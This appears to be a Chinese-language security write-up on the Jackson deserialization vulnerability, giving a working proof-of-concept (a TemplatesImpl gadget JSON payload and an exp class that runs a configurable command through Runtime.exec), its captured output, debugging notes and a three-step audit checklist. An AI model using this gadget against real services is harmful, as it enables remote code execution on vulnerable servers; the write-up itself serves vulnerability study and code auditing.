1. JACKSON漏洞解析
poc代碼:main.java
import com.fasterxml.jackson.databind.ObjectMapper; import com.sun.org.apache.xerces.internal.impl.dv.util.Base64; import org.springframework.util.FileCopyUtils; import java.io.ByteArrayOutputStream; import java.io.File; import java.io.FileInputStream; import java.io.IOException; /** * Created by Administrator on 2017/6/12. */ public class main { public static void main(String[] args) { String MASIT_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"; //改成exp存在的絕對路徑 String exp = readClassStr("D:\\workspace\\123\\target\\classes\\exp.class"); String jsonInput = aposToQuotes("{\"object\":['com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl',\n" + "{\n" + "'transletBytecodes':['"+exp+"'],\n" + "'transletName':'p',\n" + "'outputProperties':{}\n" + "}\n" + "]\n" + "}"); System.out.printf(jsonInput); ObjectMapper mapper = new ObjectMapper(); mapper.enableDefaultTyping(); User user; try { user = mapper.readValue(jsonInput, User.class); System.out.println(user.getSex()); System.out.println(user.getName()); } catch (Exception e) { e.printStackTrace(); } } public static String aposToQuotes(String json){ return json.replace("'","\""); } public static String readClassStr(String cls){ ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); try { FileCopyUtils.copy(new FileInputStream(new File(cls)),byteArrayOutputStream); } catch (IOException e) { e.printStackTrace(); } return Base64.encode(byteArrayOutputStream.toByteArray()); } }
exp.java
import com.sun.javaws.progress.Progress;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.io.*;
/**
* Created by Administrator on 2017/6/12.
*/
public class exp extends AbstractTranslet {
public exp() throws Exception {
try {
BufferedReader br = null;
//修改成你想要執行的命令
Process p = Runtime.getRuntime().exec("ipconfig");
br = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line = null;
StringBuilder sb = new StringBuilder();
while ((line = br.readLine()) != null) {
sb.append(line + "\n");
System.out.println(sb);
}
File file = new File("result.txt");
//File file =new File("javaio-appendfile.txt");
//if file doesnt exists, then create it
if(!file.exists()){
file.createNewFile();
}
//true = append file
FileWriter fileWritter = new FileWriter(file.getName(),true);
BufferedWriter bufferWritter = new BufferedWriter(fileWritter);
bufferWritter.write(sb.toString());
bufferWritter.close();
System.out.println(sb);
} catch (IOException e) {
e.printStackTrace();
}
}
@Override
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
}
@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
}
}
user.java
import java.io.Serializable; import java.util.Arrays; import java.util.InputMismatchException; import java.util.Objects; /** * Created by Administrator on 2017/6/12. */ public class User { private Object object; public Object getObject() { return object; } public void setObject(Object object) { this.object = object; } }
嘗試執行:
發現result.txt中存在結果
Windows IP ���� ��̫�������� �������� 2: ý��״̬ . . . . . . . . . . . . : ý���ѶϿ� �����ض��� DNS �� . . . . . . . : ��̫�������� Npcap Loopback Adapter: �����ض��� DNS �� . . . . . . . : �������� IPv6 ��ַ. . . . . . . . : fe80::b047:25da:330b:45d4%18 �Զ����� IPv4 ��ַ . . . . . . . : 169.254.69.212 �������� . . . . . . . . . . . . : 255.255.0.0 Ĭ�����. . . . . . . . . . . . . : ��̫�������� ��������: �����ض��� DNS �� . . . . . . . : �������� IPv6 ��ַ. . . . . . . . : fe80::fd81:27ba:8b8b:4a72%12 IPv4 ��ַ . . . . . . . . . . . . : 10.0.83.198 �������� . . . . . . . . . . . . : 255.255.255.0 Ĭ�����. . . . . . . . . . . . . : 10.0.83.1
調試本地代碼:
由於Jackson中是通過readValue執行命令,
按F7進入當前函數:
跳過幾次賦值,進入到當前函數,發現次函數中存在反序列化的賦值,按F7進行調試
經過多次調試發現,命令在標紅處代碼執行,並拋出異常
多部調試,F7進入函數代碼(SetterlessProperty.java):
代碼執行:
2. Jackson反序列化漏洞如何審計
OK,說到這就簡單介紹了下,Jackson的反序列化代碼運行的過程,那么現在代碼審計中如何審計的出來項目是否包含Jackson反序列化呢?
第一步:看版本,如果Jackson的版本號不在存在漏洞的版本列表中,肯定不會有此漏洞,
版本列表:
Jackson 2.7版本(<2.7.10)
Jackson 2.8版本(<2.8.9)
第二步:你的Bean類中是否包含object類型的變量:
例如,我這邊的User類中的Object變量定義為:private Object object
第三步:Jackson的ObjectMapper必須調用enableDefaultTyping:
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
滿足以上三個要求,才能進行構造POC進行校驗。